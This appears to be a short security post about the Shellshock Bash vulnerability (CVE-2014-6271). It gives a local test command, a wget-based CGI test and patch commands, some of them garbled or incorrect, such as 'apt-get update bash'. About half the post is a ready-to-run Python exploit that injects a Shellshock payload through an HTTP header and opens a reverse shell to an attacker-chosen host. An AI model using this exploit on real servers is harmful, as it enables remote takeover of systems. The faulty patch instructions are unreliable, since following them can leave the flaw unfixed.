Stephane Chazelas U.K. @ robotics company SeeByte find a bug in BASH
https://securityblog.redhat.com/
A quick test to check if you are vulnerable (debian, ubuntu, unix (FreeBSD).. )
env x='() { :;}; echo vulnerable' bash -c "echo this is a test" if your terminal respond : vulnerable you are vulnerable The problem is the following -> the code continue to execute after the ; -> and here you can inject malicious code ...
Also a CGI-TEST
wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test
You have to update your bash by paquets in couple of days CentOS : # yum update bash
Debian : # apt-get update bash
FreeBSD : # portsnap fetch update https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025
-------
Example of attack could be perform (in this example a Reverse Shell by http header)
#CVE-2014-6271 cgi-bin reverse shell
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data